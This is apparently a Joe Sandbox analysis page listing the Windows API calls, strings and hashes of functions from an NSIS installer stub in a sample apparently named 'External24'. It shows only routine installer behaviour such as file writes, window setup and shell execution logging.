stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNEL32(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

RichEdit20A, xrefs: 00405BE2, 00405BE7
RichEd32, xrefs: 00405BD4
RichEdit, xrefs: 00405BF0
F, xrefs: 00405A22
RichEd20, xrefs: 00405BC9
.DEFAULT\Control Panel\International, xrefs: 004059C5
.exe, xrefs: 00405A69
@jG, xrefs: 00405AF2
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
"F, xrefs: 00405A4B
_Nb, xrefs: 00405AFD

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042517C,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042517C,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

open, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user cancel, xrefs: 00401B93
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error creating "%s", xrefs: 00401AF0
File: error, user retry, xrefs: 00401B40
File: error, user abort, xrefs: 00401B53
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
API String ID: 4286501637-2478300759
Opcode ID: fd418fa43708d8aa0666defa000830a0e2171f29e6c35645b09532bac80c1258
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: fd418fa43708d8aa0666defa000830a0e2171f29e6c35645b09532bac80c1258
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Inst, xrefs: 00403698
Null, xrefs: 004036AA
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
soft, xrefs: 004036A1
Error launching installer, xrefs: 00403603

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,0042517C,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

(]C, xrefs: 004033FD
|QB, xrefs: 0040346F, 0040348A, 00403513
pAB, xrefs: 004033AB
... %d%%, xrefs: 004034C8

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: (]C$... %d%%$pAB$|QB
API String ID: 651206458-882827831
Opcode ID: cb4c91118d633cdc657fe6c8c56820a3b26f1ee58aa4180b17ceb2c9431ae53d
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: cb4c91118d633cdc657fe6c8c56820a3b26f1ee58aa4180b17ceb2c9431ae53d
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042517C,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042517C,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e5e430a04f094c47a090d134ed72cf0c528a97d1a739cdc63d14f35970fce8a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 0e5e430a04f094c47a090d134ed72cf0c528a97d1a739cdc63d14f35970fce8a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.1710920589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1710904052.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710939452.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1710955979.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1711041216.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_External24.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Non-executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042517C,74DF23A0,00000000), ref: 00406902

